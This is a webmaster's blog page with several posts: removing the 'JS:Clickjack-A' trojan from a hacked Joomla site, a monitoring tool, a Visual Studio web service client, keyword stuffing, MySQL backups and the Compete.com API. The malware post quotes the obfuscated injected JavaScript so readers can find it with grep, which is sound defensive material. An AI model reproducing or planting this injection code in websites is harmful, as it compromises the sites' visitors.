• How to remove JS:Clickjack-A [Trj] from my [yours] website

    Posted on August 8th, 2013 Webmaster 8 comments

    Hello,

    I haven't posted to this blog in a long time, I've been really busy at work, but this subject really deserves a post.

    This week I received an e-mail from a customer of a site I built, claiming that the website was infected with a virus. My first thought was "newbie user". I tried to access the website just to check that everything was running fine, the way I thought it was.

    A few days later I accessed the same site from another computer running Avast Antivirus, and I received the alert "JS:ClickJack-A [Trj] detected from website...". My conclusion: Joomla had a bug, and because I don't update Joomla with any frequency (never), I got hacked.

    But now what? How do I remove JS:Clickjack-A from my site?

    Well, that's not so hard. First of all, I found on the internet part of the malicious code:

    function dnnViewState()
    {
    var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
    t=z='';
    for(v=0;v<m.length;){t+=m.charAt(v++);
    if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
    t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
    </script>

    After that, I connected as root to my server and ran the following command from the root folder of the site:

    grep -RnisI "}document.write(" *

    This command does a recursive, case-insensitive search through all files for the string "}document.write(". This string is part of the hacker's code, but note that it can also appear on legitimate pages.

    When I found the file with the malicious code I got really angry: it was in a Joomla plugin called "AutsonSlideShow". After that I just deactivated the plugin in my Joomla panel, and my site was fixed.

    Maybe your problem is not in this plugin, or your website doesn't run on Joomla, but that's no problem: you can use the same command to find the malicious code. If you don't have root access to the server, you can download all the pages from your site to your computer and do the same search, or you can check for recently modified files.
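    Checking for recently modified files is easy with find. A minimal sketch (the 7-day window is just an assumption, adjust it to when the alert started):

```shell
# List files under the current directory modified in the last 7 days;
# on a hacked site, recently changed files are the prime suspects.
find . -type f -mtime -7
```

    You can also pipe the result into the grep above with xargs to search only those files.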

    If you need help, just leave a comment on this post.

     


  • Website and Server Monitoring Tool

    Posted on June 9th, 2010 Webmaster No comments

    Over the last few months I have been developing a website and server monitoring tool. What this tool will be able to do is internal and external monitoring.

    External Monitoring:

    - HTTP CHECKS

    - ICMP CHECKS

    - TCP CHECKS

    Internal Monitoring:

    - CPU USAGE

    - HARD DISK USAGE

    - MEMORY USAGE

    - PROCESSES RUNNING
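    As a rough illustration of what an external HTTP check does, here is a minimal shell sketch (the timeout and the function name are just placeholders, not the tool's actual code):

```shell
# Minimal external HTTP check: fetch only the HTTP status code.
# Prints e.g. "200" when the site answers, "000" when it is unreachable.
check_http() {
  curl -s -o /dev/null --max-time 10 -w "%{http_code}" "$1"
}

# Usage: check_http "http://example.com"
```

    The ICMP and TCP checks work the same way in spirit: send a probe, wait with a timeout, report up/down plus latency.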

    Preview of the app:

    External Monitoring Screen



    Internal Monitoring Screen


    What I need to know is: do some of you guys want to test it, and what do you think about this type of application?


  • Creating a webservice client on Visual Studio 2008

    Posted on April 25th, 2010 Webmaster No comments

    Hello guys,

    I will show here how to create a web service client in Visual Studio 2008; you will see how easy it can be.

    1. Right-click on your project and choose "Add Web Reference".

    Add web reference

    2. After that you need to insert the URL of the web service and then follow the usual Windows wizard steps: next, next, finish. In my case I am connecting to a web service running on my own machine.

    Insert webservice url

    3. You will notice that if everything goes fine, VS 2008 creates the source files ready to use.

    Code generated

    4. Here is a sample of how to use your web service client inside your application code.

    localhost::NetunoWSService ws;
    System::String^ res = "WS NOT AVAILABLE";

    try
    {
        res = ws.sendData(this->email, this->password, this->hostname, data);
    }
    catch (System::Exception^ ex)
    {
        //res = ex->ToString();
        res = "Web Service is not available or your internet is down";
    }

    5. If you change something in your web service server application, you will need to update the web references.

    Enjoy! If you have any questions, I am open for discussion!


  • Keyword Stuffing

    Posted on October 2nd, 2009 jaghanivasan No comments

    This involves the calculated placement of keywords within a page to raise the keyword count, variety, and density of the page. This is useful to make a page appear to be relevant for a web crawler in a way that makes it more likely to be found. Example: a promoter of a Ponzi scheme wants to attract web surfers to a site where he advertises his scam. He places hidden text appropriate for a fan page of a popular music group on his page, hoping that the page will be listed as a fan site and receive many visits from music lovers.

    Older versions of indexing programs simply counted how often a keyword appeared, and used that to determine relevance levels. Most modern search engines have the ability to analyze a page for keyword stuffing and determine whether the frequency is consistent with other sites created specifically to attract search engine traffic. Also, large webpages are truncated, so that massive dictionary lists cannot be indexed on a single webpage.


  • Backup and Restore MySQL Databases

    Posted on June 1st, 2009 Webmaster No comments

    I will show just the most basic and commonly used methods for MySQL backup and restore.

    1st Method – Mysql Dump

    mysqldump is the most common method for backing up a MySQL database. A database dump is a text file with the CREATE TABLE statements, the columns, the INSERT rows...

    To make a MySQL dump (backup), use the following command:

    single database: mysqldump -u user -ppassword database-name > backup-file-name.sql

    all databases: mysqldump -u user -ppassword -A > backup-file-name.sql

    Note that there is no space between -p and the password; with a space, the client treats the next word as a database name and prompts for the password instead.

    To restore a MySQL dump, use the following command:

    mysql -u user -ppassword database-name < backup-file-name.sql
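    In practice the dump usually goes into a compressed, date-stamped file so it can run unattended from cron. A minimal sketch (the credentials and the filename pattern are placeholder assumptions):

```shell
# Dump all databases into a compressed, date-stamped file,
# e.g. all-databases-2013-08-08.sql.gz
BACKUP_FILE="all-databases-$(date +%Y-%m-%d).sql.gz"
mysqldump -u user -ppassword -A | gzip > "$BACKUP_FILE"
```

    To restore, pipe it back through gunzip: gunzip < all-databases-2013-08-08.sql.gz | mysql -u user -ppassword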


    2nd Method – Mysql Folders Backup

    The folder backup is faster: all the MySQL databases are in the folder /var/lib/mysql, and each database is in its own folder. Note that for a consistent copy, the MySQL server should be stopped (or the tables locked) while you copy the folder.

    To back up using this method, use the following command:
    tar -cf backup-file-name.tar /var/lib/mysql/database-name

    To restore using this method, extract the file from the root directory (tar strips the leading "/" when archiving):
    cd / && tar -xvf backup-file-name.tar

    That's it, now you just need to pick your method.

     


  • Using Compete.com API in your Website

    Posted on March 9th, 2009 Webmaster No comments

    Compete.com is a company that provides web analytics: visitors, keywords driving traffic, and more. Some of the results that Compete.com offers are only for paying users; others are free.

    In this post I will show you how you can use the Compete.com API on your website, like I did on my http://whois.gwebtools.com/compete.com.

    Step 1: Register for a developer user account.

    Register Compete Screen


    Step 2: Register your application to get your personal API key.

    Register App


    Step 3: Start coding using your API key.

    Sample Call

    http://api.compete.com/fast-cgi/MI?d=google.com&ver=3&apikey=1234567890&size=large

    Sample Result

    <ci>
    <dmn>
    <nm>google.com</nm>
    <trust caption="Trust">
    <val>green</val>
    <link>http://toolbar.compete.com/trustgreen/google.com</link>
    <icon>http://home.compete.com.edgesuite.net/site_media/images/icons/trust_green_53.gif</icon>
    </trust>
    <rank caption="Profile">
    <val>2</val>
    <link>http://toolbar.compete.com/siteprofile/google.com</link>
    <icon>http://home.compete.com.edgesuite.net/site_media/images/icons/profile_3_53.gif</icon>
    </rank>
    <metrics caption="Profile">
    <val>
    <mth>12</mth>
    <yr>2006</yr>
    <uv>
    <ranking>2</ranking>
    <count>115,120,111</count>
    </uv>
    </val>
    <link>http://toolbar.compete.com/siteprofile/google.com</link>
    <icon>http://home.compete.com.edgesuite.net/site_media/images/icons/profile_3_53.gif</icon>
    </metrics>
    <deals caption="Deals">
    <val>1</val>
    <link>http://toolbar.compete.com/deals/google.com</link>
    <icon>http://home.compete.com.edgesuite.net/site_media/images/icons/deals_on_53.gif</icon>
    </deals>
    </dmn>
    </ci>

    How to parse it?

    You can develop your own XML parser, but if you use PHP or .NET it is really not necessary: you can use the scripts that Compete.com provides.

    .NET wrapper

    PHP5 wrapper

    PHP5 wrapper in the PEAR repository
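    If you only need one field and don't want a wrapper at all, even a quick shell sketch over the response works (shown here on a trimmed version of the sample above; a real XML parser is still the safer choice):

```shell
# Extract the <nm> value from a (trimmed) sample response with sed.
response='<ci><dmn><nm>google.com</nm></dmn></ci>'
echo "$response" | sed -n 's:.*<nm>\(.*\)</nm>.*:\1:p'
# prints: google.com
```

    The same pattern works for any of the simple tags in the response, like <val> or <ranking>.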

    For more info, access the developer zone on Compete.com.